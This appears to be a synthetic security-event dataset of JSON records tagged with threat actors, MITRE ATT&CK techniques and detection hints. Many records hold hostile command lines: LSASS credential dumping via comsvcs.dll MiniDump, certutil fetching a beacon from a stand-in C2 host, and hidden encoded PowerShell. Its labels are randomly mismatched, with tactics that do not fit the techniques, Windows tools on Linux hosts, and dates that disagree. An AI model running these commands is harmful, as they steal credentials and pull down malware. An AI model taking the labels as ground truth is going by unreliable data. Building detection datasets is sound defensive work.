text
stringlengths 1.13k
1.33k
|
|---|
{"attack":{"actor":"Mustang Panda","confidence":1.0,"description":"[Mustang Panda] performed T1021.006 using cloud-native technique.","sub_technique":"Windows Remote Management","tactic":["Collection","Execution","Command and Control"],"technique_id":"T1021.006"},"event_id":"evt_mustangpanda_20251007T001132000Z_0000601","ground_truth":{"detection_guidance":"Sigma rule for T1021.006 | Join on src_ip within 10m","evasion_used":["WMI","JA3 Spoof","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.172.226.209","name":"IAM-ROLE-KW2WJ5VYS3","os":"Windows 11"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"601Mustang PandaT1021.006"},"network":{"domain":"cdn-content.com","dst_ip":"1.191.241.250","dst_port":8443,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc JABkACAALQBlAH...","name":"cmstp.exe","parent_name":"services.exe"},"source":"Windows Security Log","timestamp":"2025-05-04T21:45:53.000Z","user":{"name":"azuread\\osu7v72of7t4","sid":"S-1-5-21-858569774-412913111-1417"}}
|
{"attack":{"actor":"APT41","confidence":1.0,"description":"[APT41] performed T1059.001 using fileless technique.","sub_technique":"PowerShell","tactic":["Defense Evasion","Impact","Credential Access"],"technique_id":"T1059.001"},"event_id":"evt_apt41_20260929T161324000Z_0000603","ground_truth":{"detection_guidance":"Sigma rule for T1059.001 | Join on src_ip within 10m","evasion_used":["LOLBin","TLS","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.96.61.239","name":"EC2-INST-FFLTXTHKGF","os":"Windows Server 2022"},"impact":{"business_risk":"Long-term persistence achieved","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"603APT41T1059.001"},"network":{"domain":"aws.amazon.com","dst_ip":"1.188.245.21","dst_port":3389,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 2043 C:\\temp\\lsass.dmp full","name":"mshta.exe","parent_name":"winlogon.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2026-08-22T01:54:31.000Z","user":{"name":"svc_tk4907vsi325","sid":"S-1-5-21-638374067-993552560-4000"}}
|
{"attack":{"actor":"APT29","confidence":1.0,"description":"[APT29] performed T1484.001 using encrypted C2 technique.","sub_technique":"Domain Policy Modification: Group Policy Modification","tactic":["Defense Evasion"],"technique_id":"T1484.001"},"event_id":"evt_apt29_20260618T185956000Z_0000605","ground_truth":{"detection_guidance":"Sigma rule for T1484.001 | Join on src_ip within 10m","evasion_used":["Base64","LOLBin","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.229.134.136","name":"DB-ORACLE-X8CRWA6C8U","os":"Amazon Linux 2"},"impact":{"business_risk":"Domain dominance","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"605APT29T1484.001"},"network":{"domain":"github.com","dst_ip":"1.175.185.14","dst_port":8443,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 3543 C:\\temp\\lsass.dmp full","name":"bitsadmin.exe","parent_name":"svchost.exe"},"source":"Sysmon (DS0024)","timestamp":"2026-05-14T12:27:44.000Z","user":{"name":"arn:aws:iam::j4ef0a72wx2z","sid":"S-1-5-21-613675566-544295841-8309"}}
|
{"attack":{"actor":"Lapsus$","confidence":1.0,"description":"[Lapsus$] performed T1570 using cloud-native technique.","sub_technique":"Lateral Tool Transfer","tactic":["Collection","Command and Control","Initial Access"],"technique_id":"T1570"},"event_id":"evt_lapsus_20260509T001833000Z_0000607","ground_truth":{"detection_guidance":"Sigma rule for T1570 | Join on src_ip within 10m","evasion_used":["TLS","WMI","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.113.63.60","name":"AZURE-VM-GYMZWZBZX9","os":"Windows 11"},"impact":{"business_risk":"Cloud environment takeover","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"607Lapsus$T1570"},"network":{"domain":"cdn-content.com","dst_ip":"1.124.253.54","dst_port":8443,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 1429 C:\\temp\\lsass.dmp full","name":"powershell.exe","parent_name":"explorer.exe"},"source":"Sysmon (DS0024)","timestamp":"2026-10-26T01:15:46.000Z","user":{"name":"arn:aws:iam::q44joh9wpr4m","sid":"S-1-5-21-882678681-194170312-2857"}}
|
{"attack":{"actor":"Lapsus$","confidence":1.0,"description":"[Lapsus$] performed T1071.001 using fileless technique.","sub_technique":"Web Protocols (HTTPS C2)","tactic":["Defense Evasion","Reconnaissance","Discovery"],"technique_id":"T1071.001"},"event_id":"evt_lapsus_20260428T212424000Z_0000609","ground_truth":{"detection_guidance":"Sigma rule for T1071.001 | Join on src_ip within 10m","evasion_used":["Base64","JA3 Spoof","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.216.154.48","name":"EC2-INST-0GWKOCBGAL","os":"Windows Server 2022"},"impact":{"business_risk":"Domain dominance","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"609Lapsus$T1071.001"},"network":{"domain":"github.com","dst_ip":"1.152.62.132","dst_port":3389,"protocol":"HTTP/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...","name":"cmstp.exe","parent_name":"winlogon.exe"},"source":"Network Connection (DS0029)","timestamp":"2026-04-07T23:08:49.000Z","user":{"name":"svc_v0aksrrjbcuq","sid":"S-1-5-21-580398829-641232617-9060"}}
|
{"attack":{"actor":"UNC4841","confidence":1.0,"description":"[UNC4841] performed T1546.003 using LOLBin technique.","sub_technique":"Event Triggered Execution: WMI Event Subscription","tactic":["Exfiltration"],"technique_id":"T1546.003"},"event_id":"evt_unc4841_20250308T093805000Z_0000611","ground_truth":{"detection_guidance":"Sigma rule for T1546.003 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","LOLBin","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.13.90.239","name":"EC2-INST-NW6H3SFNSY","os":"Amazon Linux 2"},"impact":{"business_risk":"Domain dominance","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"611UNC4841T1546.003"},"network":{"domain":"aws.amazon.com","dst_ip":"1.105.110.37","dst_port":3389,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"bitsadmin.exe","parent_name":"services.exe"},"source":"Sysmon (DS0024)","timestamp":"2026-09-27T16:09:39.000Z","user":{"name":"CORP\\68tn60qrygh7","sid":"S-1-5-21-856858915-482262642-9114"}}
|
{"attack":{"actor":"UNC4841","confidence":1.0,"description":"[UNC4841] performed T1071.001 using LOLBin technique.","sub_technique":"Web Protocols (HTTPS C2)","tactic":["Defense Evasion","Exfiltration"],"technique_id":"T1071.001"},"event_id":"evt_unc4841_20250114T210742000Z_0000613","ground_truth":{"detection_guidance":"Sigma rule for T1071.001 | Join on src_ip within 10m","evasion_used":["Base64","JA3 Spoof","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.22.183.192","name":"EC2-INST-1CP9AL7H0N","os":"Windows Server 2022"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"613UNC4841T1071.001"},"network":{"domain":"aws.amazon.com","dst_ip":"1.175.218.242","dst_port":3389,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 2702 C:\\temp\\lsass.dmp full","name":"certutil.exe","parent_name":"services.exe"},"source":"Network Connection (DS0029)","timestamp":"2026-02-20T02:49:55.000Z","user":{"name":"CORP\\h1i9h5341kcc","sid":"S-1-5-21-449620553-151745739-8470"}}
|
{"attack":{"actor":"APT41","confidence":1.0,"description":"[APT41] performed T1003.001 using encrypted C2 technique.","sub_technique":"OS Credential Dumping: LSASS Memory","tactic":["Persistence"],"technique_id":"T1003.001"},"event_id":"evt_apt41_20260406T144636000Z_0000615","ground_truth":{"detection_guidance":"Sigma rule for T1003.001 | Join on src_ip within 10m","evasion_used":["Base64","Fileless","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.82.44.58","name":"AZURE-VM-B9FIQ2877P","os":"Amazon Linux 2"},"impact":{"business_risk":"Domain dominance","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"615APT41T1003.001"},"network":{"domain":"cdn-content.com","dst_ip":"1.66.179.153","dst_port":8443,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"wmic.exe","parent_name":"svchost.exe"},"source":"CloudTrail (DS0028)","timestamp":"2026-11-08T18:25:58.000Z","user":{"name":"i-1ua6e0g9zysy","sid":"S-1-5-21-385917918-511821555-5786"}}
|
{"attack":{"actor":"Scattered Spider","confidence":1.0,"description":"[Scattered Spider] performed T1098.004 using LOLBin technique.","sub_technique":"SSH Authorized Keys","tactic":["Execution","Impact"],"technique_id":"T1098.004"},"event_id":"evt_scatteredspider_20250922T040646000Z_0000617","ground_truth":{"detection_guidance":"Sigma rule for T1098.004 | Join on src_ip within 10m","evasion_used":["WMI","Fileless","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.241.175.132","name":"DB-ORACLE-0V4CQGT6FA","os":"Windows Server 2022"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"617Scattered SpiderT1098.004"},"network":{"domain":"cdn-content.com","dst_ip":"1.36.21.42","dst_port":3389,"protocol":"HTTP/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...","name":"certutil.exe","parent_name":"svchost.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2026-05-30T07:41:01.000Z","user":{"name":"arn:aws:iam::f4ciorpq63s7","sid":"S-1-5-21-911290874-682241690-7877"}}
|
{"attack":{"actor":"APT29","confidence":1.0,"description":"[APT29] performed T1570 using encrypted C2 technique.","sub_technique":"Lateral Tool Transfer","tactic":["Initial Access","Command and Control"],"technique_id":"T1570"},"event_id":"evt_apt29_20260607T101403000Z_0000619","ground_truth":{"detection_guidance":"Sigma rule for T1570 | Join on src_ip within 10m","evasion_used":["WMI","Base64","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.173.190.246","name":"IAM-ROLE-21UPL07R56","os":"Windows Server 2022"},"impact":{"business_risk":"Domain dominance","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"619APT29T1570"},"network":{"domain":"aws.amazon.com","dst_ip":"1.42.223.91","dst_port":443,"protocol":"HTTP/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...","name":"mshta.exe","parent_name":"winlogon.exe"},"source":"Network Connection (DS0029)","timestamp":"2026-09-04T12:50:43.000Z","user":{"name":"azuread\\wa009sx51kub","sid":"S-1-5-21-649627354-649243010-4285"}}
|
{"attack":{"actor":"FIN7","confidence":1.0,"description":"[FIN7] performed T1071.001 using cloud-native technique.","sub_technique":"Web Protocols (HTTPS C2)","tactic":["Persistence","Credential Access"],"technique_id":"T1071.001"},"event_id":"evt_fin7_20250401T195217000Z_0000621","ground_truth":{"detection_guidance":"Sigma rule for T1071.001 | Join on src_ip within 10m","evasion_used":["LOLBin","JA3 Spoof","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.204.227.117","name":"EC2-INST-NZOZ9UE5QA","os":"Amazon Linux 2"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"621FIN7T1071.001"},"network":{"domain":"update.microsoft.com","dst_ip":"1.159.49.2","dst_port":443,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 3615 C:\\temp\\lsass.dmp full","name":"certutil.exe","parent_name":"svchost.exe"},"source":"Network Connection (DS0029)","timestamp":"2026-04-02T20:03:42.000Z","user":{"name":"arn:aws:iam::pxw6d5unxcit","sid":"S-1-5-21-739822796-225409448-1564"}}
|
{"attack":{"actor":"UNC4841","confidence":1.0,"description":"[UNC4841] performed T1531 using LOLBin technique.","sub_technique":"Cloud Service Hijack / Account Access Removal","tactic":["Reconnaissance"],"technique_id":"T1531"},"event_id":"evt_unc4841_20261116T194454000Z_0000623","ground_truth":{"detection_guidance":"Sigma rule for T1531 | Join on src_ip within 10m","evasion_used":["Fileless","JA3 Spoof","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.53.67.22","name":"WIN-FIN-SRV-MTMR9KW3HV","os":"Windows Server 2022"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"623UNC4841T1531"},"network":{"domain":"cdn-content.com","dst_ip":"1.144.84.157","dst_port":5985,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...","name":"wmic.exe","parent_name":"services.exe"},"source":"Network Connection (DS0029)","timestamp":"2026-09-24T21:40:39.000Z","user":{"name":"i-aktqdfawhd66","sid":"S-1-5-21-364879610-419355264-4652"}}
|
{"attack":{"actor":"Scattered Spider","confidence":1.0,"description":"[Scattered Spider] performed T1021.006 using LOLBin technique.","sub_technique":"Windows Remote Management","tactic":["Credential Access"],"technique_id":"T1021.006"},"event_id":"evt_scatteredspider_20261228T051948000Z_0000625","ground_truth":{"detection_guidance":"Sigma rule for T1021.006 | Join on src_ip within 10m","evasion_used":["Fileless","Base64","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.68.92.103","name":"IAM-ROLE-8OVMCUQDG0","os":"Amazon Linux 2"},"impact":{"business_risk":"Domain dominance","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"625Scattered SpiderT1021.006"},"network":{"domain":"cdn-content.com","dst_ip":"1.39.3.183","dst_port":445,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"powershell.exe","parent_name":"winlogon.exe"},"source":"Sysmon (DS0024)","timestamp":"2025-02-20T02:33:53.000Z","user":{"name":"svc_jcof0le707q4","sid":"S-1-5-21-429181182-162593102-7924"}}
|
{"attack":{"actor":"Volt Typhoon","confidence":1.0,"description":"[Volt Typhoon] performed T1566.001 using encrypted C2 technique.","sub_technique":"Phishing: Spearphishing Attachment","tactic":["Exfiltration","Credential Access","Discovery"],"technique_id":"T1566.001"},"event_id":"evt_volttyphoon_20250116T202213000Z_0000627","ground_truth":{"detection_guidance":"Sigma rule for T1566.001 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","LOLBin","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.145.229.157","name":"APP-WEB-9ONL1IOTBL","os":"Windows Server 2022"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"627Volt TyphoonT1566.001"},"network":{"domain":"github.com","dst_ip":"1.96.203.110","dst_port":3389,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 1856 C:\\temp\\lsass.dmp full","name":"mshta.exe","parent_name":"winlogon.exe"},"source":"CloudTrail (DS0028)","timestamp":"2025-04-16T23:06:48.000Z","user":{"name":"i-4gxp9alje72q","sid":"S-1-5-21-345373082-608487312-5488"}}
|
{"attack":{"actor":"APT29","confidence":1.0,"description":"[APT29] performed T1546.003 using cloud-native technique.","sub_technique":"Event Triggered Execution: WMI Event Subscription","tactic":["Exfiltration","Initial Access","Privilege Escalation"],"technique_id":"T1546.003"},"event_id":"evt_apt29_20250127T052020000Z_0000629","ground_truth":{"detection_guidance":"Sigma rule for T1546.003 | Join on src_ip within 10m","evasion_used":["WMI","Base64","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.204.98.198","name":"IAM-ROLE-R1L1ZJ9X1C","os":"Ubuntu 22.04"},"impact":{"business_risk":"Long-term persistence achieved","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"629APT29T1546.003"},"network":{"domain":"aws.amazon.com","dst_ip":"1.120.106.106","dst_port":443,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc JABkACAALQBlAH...","name":"certutil.exe","parent_name":"explorer.exe"},"source":"Windows Security Log","timestamp":"2026-05-19T10:58:45.000Z","user":{"name":"CORP\\x54wbi3av29m","sid":"S-1-5-21-734335108-601628142-1972"}}
|
{"attack":{"actor":"Mustang Panda","confidence":1.0,"description":"[Mustang Panda] performed T1021.006 using encrypted C2 technique.","sub_technique":"Windows Remote Management","tactic":["Impact"],"technique_id":"T1021.006"},"event_id":"evt_mustangpanda_20260830T091544000Z_0000631","ground_truth":{"detection_guidance":"Sigma rule for T1021.006 | Join on src_ip within 10m","evasion_used":["Fileless","LOLBin","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.13.156.5","name":"IAM-ROLE-IDX4CGYZPG","os":"Windows Server 2022"},"impact":{"business_risk":"Domain dominance","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"631Mustang PandaT1021.006"},"network":{"domain":"update.microsoft.com","dst_ip":"1.135.146.141","dst_port":5985,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...","name":"rundll32.exe","parent_name":"services.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2026-11-29T13:41:43.000Z","user":{"name":"i-yei87lwz8z1y","sid":"S-1-5-21-870757191-849843417-7078"}}
|
{"attack":{"actor":"Volt Typhoon","confidence":1.0,"description":"[Volt Typhoon] performed T1003.001 using encrypted C2 technique.","sub_technique":"OS Credential Dumping: LSASS Memory","tactic":["Discovery"],"technique_id":"T1003.001"},"event_id":"evt_volttyphoon_20250606T214223000Z_0000633","ground_truth":{"detection_guidance":"Sigma rule for T1003.001 | Join on src_ip within 10m","evasion_used":["LOLBin","JA3 Spoof","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.7.154.30","name":"APP-WEB-YWU5FC6BDO","os":"Ubuntu 22.04"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"633Volt TyphoonT1003.001"},"network":{"domain":"github.com","dst_ip":"1.60.18.47","dst_port":3389,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc JABkACAALQBlAH...","name":"mshta.exe","parent_name":"explorer.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2026-12-21T11:46:46.000Z","user":{"name":"i-octh3kw7k1s9","sid":"S-1-5-21-977782417-672614349-7671"}}
|
{"attack":{"actor":"Mustang Panda","confidence":1.0,"description":"[Mustang Panda] performed T1059.001 using fileless technique.","sub_technique":"PowerShell","tactic":["Command and Control","Credential Access"],"technique_id":"T1059.001"},"event_id":"evt_mustangpanda_20251109T010822000Z_0000635","ground_truth":{"detection_guidance":"Sigma rule for T1059.001 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","LOLBin","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.34.187.95","name":"APP-WEB-D82YXGJ3V0","os":"Windows Server 2022"},"impact":{"business_risk":"Long-term persistence achieved","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"635Mustang PandaT1059.001"},"network":{"domain":"aws.amazon.com","dst_ip":"1.37.221.43","dst_port":3389,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 861 C:\\temp\\lsass.dmp full","name":"certutil.exe","parent_name":"explorer.exe"},"source":"Network Connection (DS0029)","timestamp":"2025-12-07T18:16:04.000Z","user":{"name":"azuread\\esfotkhuipy3","sid":"S-1-5-21-212280869-331430732-9297"}}
|
{"attack":{"actor":"Scattered Spider","confidence":1.0,"description":"[Scattered Spider] performed T1566.001 using encrypted C2 technique.","sub_technique":"Phishing: Spearphishing Attachment","tactic":["Exfiltration","Privilege Escalation"],"technique_id":"T1566.001"},"event_id":"evt_scatteredspider_20260612T160851000Z_0000637","ground_truth":{"detection_guidance":"Sigma rule for T1566.001 | Join on src_ip within 10m","evasion_used":["TLS","JA3 Spoof","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.163.151.43","name":"WIN-FIN-SRV-C3QEIFOENJ","os":"Windows Server 2022"},"impact":{"business_risk":"Cloud environment takeover","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"637Scattered SpiderT1566.001"},"network":{"domain":"cdn-content.com","dst_ip":"1.108.224.214","dst_port":443,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 1109 C:\\temp\\lsass.dmp full","name":"wmic.exe","parent_name":"services.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2026-01-05T21:02:07.000Z","user":{"name":"svc_w9swe9tc1lvm","sid":"S-1-5-21-420783860-877701471-4924"}}
|
{"attack":{"actor":"UNC4841","confidence":1.0,"description":"[UNC4841] performed T1071.001 using encrypted C2 technique.","sub_technique":"Web Protocols (HTTPS C2)","tactic":["Impact"],"technique_id":"T1071.001"},"event_id":"evt_unc4841_20250810T002953000Z_0000639","ground_truth":{"detection_guidance":"Sigma rule for T1071.001 | Join on src_ip within 10m","evasion_used":["TLS","LOLBin","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.195.80.61","name":"AZURE-VM-P5IOVHVN0R","os":"Ubuntu 22.04"},"impact":{"business_risk":"Domain dominance","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"639UNC4841T1071.001"},"network":{"domain":"aws.amazon.com","dst_ip":"1.85.202.6","dst_port":5985,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc JABkACAALQBlAH...","name":"powershell.exe","parent_name":"services.exe"},"source":"CloudTrail (DS0028)","timestamp":"2025-07-26T08:34:30.000Z","user":{"name":"azuread\\wd577nd52amy","sid":"S-1-5-21-487900729-228996332-4060"}}
|
{"attack":{"actor":"Lapsus$","confidence":1.0,"description":"[Lapsus$] performed T1059.001 using encrypted C2 technique.","sub_technique":"PowerShell","tactic":["Impact"],"technique_id":"T1059.001"},"event_id":"evt_lapsus_20261008T001533000Z_0000641","ground_truth":{"detection_guidance":"Sigma rule for T1059.001 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","Fileless","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.61.21.131","name":"WIN-FIN-SRV-3E1F2P0OF6","os":"Windows 11"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"641Lapsus$T1059.001"},"network":{"domain":"cdn-content.com","dst_ip":"1.182.163.202","dst_port":3389,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...","name":"rundll32.exe","parent_name":"svchost.exe"},"source":"Network Connection (DS0029)","timestamp":"2026-04-08T17:44:10.000Z","user":{"name":"azuread\\8xyqlad1ny78","sid":"S-1-5-21-890544755-389919676-2173"}}
|
{"attack":{"actor":"FIN7","confidence":1.0,"description":"[FIN7] performed T1566.001 using LOLBin technique.","sub_technique":"Phishing: Spearphishing Attachment","tactic":["Execution"],"technique_id":"T1566.001"},"event_id":"evt_fin7_20261031T181425000Z_0000643","ground_truth":{"detection_guidance":"Sigma rule for T1566.001 | Join on src_ip within 10m","evasion_used":["TLS","LOLBin","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.214.99.20","name":"APP-WEB-DU1MYYVELI","os":"Windows 11"},"impact":{"business_risk":"Domain dominance","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"643FIN7T1566.001"},"network":{"domain":"cdn-content.com","dst_ip":"1.89.187.241","dst_port":443,"protocol":"HTTP/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"cmstp.exe","parent_name":"services.exe"},"source":"Sysmon (DS0024)","timestamp":"2026-03-25T23:40:36.000Z","user":{"name":"arn:aws:iam::jecu0u91pzia","sid":"S-1-5-21-439418443-651096405-4551"}}
|
{"attack":{"actor":"FIN7","confidence":1.0,"description":"[FIN7] performed T1003.001 using LOLBin technique.","sub_technique":"OS Credential Dumping: LSASS Memory","tactic":["Discovery","Persistence","Lateral Movement"],"technique_id":"T1003.001"},"event_id":"evt_fin7_20250427T052639000Z_0000645","ground_truth":{"detection_guidance":"Sigma rule for T1003.001 | Join on src_ip within 10m","evasion_used":["WMI","LOLBin","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.124.41.110","name":"APP-WEB-IXKDELZIX2","os":"Ubuntu 22.04"},"impact":{"business_risk":"Domain dominance","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"645FIN7T1003.001"},"network":{"domain":"cdn-content.com","dst_ip":"1.41.171.32","dst_port":445,"protocol":"HTTP/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"rundll32.exe","parent_name":"winlogon.exe"},"source":"Sysmon (DS0024)","timestamp":"2026-06-15T19:13:27.000Z","user":{"name":"svc_c34uxxrm5mee","sid":"S-1-5-21-618658154-626127743-5355"}}
|
{"attack":{"actor":"Volt Typhoon","confidence":1.0,"description":"[Volt Typhoon] performed T1531 using fileless technique.","sub_technique":"Cloud Service Hijack / Account Access Removal","tactic":["Initial Access","Impact"],"technique_id":"T1531"},"event_id":"evt_volttyphoon_20261203T184927000Z_0000647","ground_truth":{"detection_guidance":"Sigma rule for T1531 | Join on src_ip within 10m","evasion_used":["LOLBin","TLS","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.58.143.222","name":"EC2-INST-ASYTGAFNFD","os":"Windows Server 2022"},"impact":{"business_risk":"Data exfiltration channel open","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"647Volt TyphoonT1531"},"network":{"domain":"aws.amazon.com","dst_ip":"1.56.94.15","dst_port":5985,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc 